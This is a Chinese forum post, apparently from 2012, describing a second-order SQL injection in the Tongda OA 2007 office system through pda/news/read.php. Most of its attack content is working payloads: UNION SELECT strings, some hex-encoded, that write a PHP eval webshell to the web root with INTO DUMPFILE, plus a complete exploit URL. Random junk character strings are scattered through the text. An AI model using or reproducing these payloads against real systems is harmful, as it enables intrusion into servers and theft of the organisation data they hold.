目前测试通达OA2007版本
. O' ?, s+ O( p! ~( X6 l* [2 T2 g4 O0 W8 C+ D% z
% X& Z; q0 X, g
Office Anywhere 2007 网络智能办公系统
# v( _( J' P9 x: K( n ) c- q# T% ^9 O9 D$ A
http://127.0.0.1/pda/news/read.php?P=%cf' 猪点。 暴web目录..
. |* [( Z) B' j2 c e( h ( p8 c# L5 o0 t. q1 o
7 h$ _3 ~& m$ c
这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的$ G3 p3 o5 S* b ?
" w& c" r( {+ W/ H5 E! T
例如:SELECT * from USER where USER_ID='{$USERNAME}' ! k1 r. G" a* W% r+ {
其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了
, G) w3 A) v1 |" \# H
4 p: P4 }1 s0 l( e) |这个时候我们是不是可以组合起来使用哪?, ?, p# J5 Q8 V3 m3 h* i$ r
; x K" s" }, ?6 J; O
第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样. q4 X' Q6 b" k# c8 f: _4 W- Q
union select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,102 R8 e7 X; p. t T- d1 R
+ F* D/ V1 y3 d
这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了
0 M) B3 b3 [% }" q5 ~" @; h , W( C: w- \, m: ]) ^" [: g! S
那么问题来了,单引号可以吗?当然是不可以的,^_^。。。# G" f$ d7 y/ ~5 q* R! z) z
- _/ N7 H* @$ O7 {那么我们用字符串格式带入进行hex编码( d7 d& O( ~( V$ R d1 j
0 i2 O9 f$ ]. n8 p4 E
%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23" `* X$ p- `- R& X! N
3 S: G: P7 }4 Q# w4 v
测试ok,获取oa的webshell7 f0 ~# d+ M" H4 B% ^! ?
# H7 }5 ]: H; c! R9 Y1 Y
7 m, s; Y9 C$ ^4 ?: T% N# X8 \pda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23 K# S/ i8 L% Y4 D3 R1 i. X. B: `0 h
直接getwebshell |
发表于 2012-12-20 08:09:24
收藏
支持
反对